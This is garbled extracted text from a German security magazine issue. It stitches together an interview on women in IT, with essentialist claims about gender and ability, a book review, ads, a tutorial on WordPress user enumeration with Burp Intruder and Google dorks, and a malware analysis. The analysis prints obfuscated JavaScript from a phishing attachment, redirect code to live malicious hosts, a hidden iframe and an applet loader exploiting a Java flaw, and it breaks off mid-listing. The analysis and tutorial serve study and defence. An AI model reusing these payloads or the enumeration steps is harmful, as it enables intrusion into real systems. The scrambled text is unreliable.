hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
920108
FUumlR EINSTEIGER
Nun muumlssen wir uns genauer ansehen was zwischen unserem Client und dem Webserver kommuniziert wird Hierfuumlr starten wir Burpsuite und konfigurieren unseren Browser so dass er als Proxy localhost auf Port 8080 verwendet Als naumlchstes wechseln wir in den Proxy-Tab und setzen Intercept auf Off Durch das Deaktivieren dieser Funktion verhindern wir das uns Burpuite bei jedem Schritt fraumlgt ob wir die Daten wirklich zu unse-rem Webserver senden wollen Als naumlchstes besuchen wird unsere Zielseite Wordpress verwendet immer das gleiche Schema httpwwwzielseitedewp-login
phpaction=lostpassword Wir geben absichtlich ei-nen falschen Benutzernamen an und verfolgen wie die
POST-Anfrage und deren Antwort von Burpsuite aufge-zeichnet werden Dort koumlnnen wir unter request -gt pa-
rams unsere gerade eingegebenen und noch weitere Daten betrachten (Abbildung 2)
Als naumlchstes senden wir den Request per Rechts-klick an den Intruder Das Target-Tab lassen wir unbe-ruumlhrt wir werden erst bei den Positions-Optionen aktiv Wir klicken rechts auf bdquoclear $ldquo Als Attacke verwenden wir Sniper Ganz unten im Textfeld sehen wir eine Zeile mit bdquouser_loginldquo Dies sind die Parameter die per POST uumlbergeben werden Ich markiere den zum Test einge-gebenen Benutzername und klicke auf bdquoadd $ldquo (Abbil-dung 3)
Abbildung 3 Der Parameter der veraumlndert werden soll wird markiert
Abbildung 2 Unser POST-Request an Wordpress
User Enumeration bei Web-Applikationen
hakin9orgde 9
Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
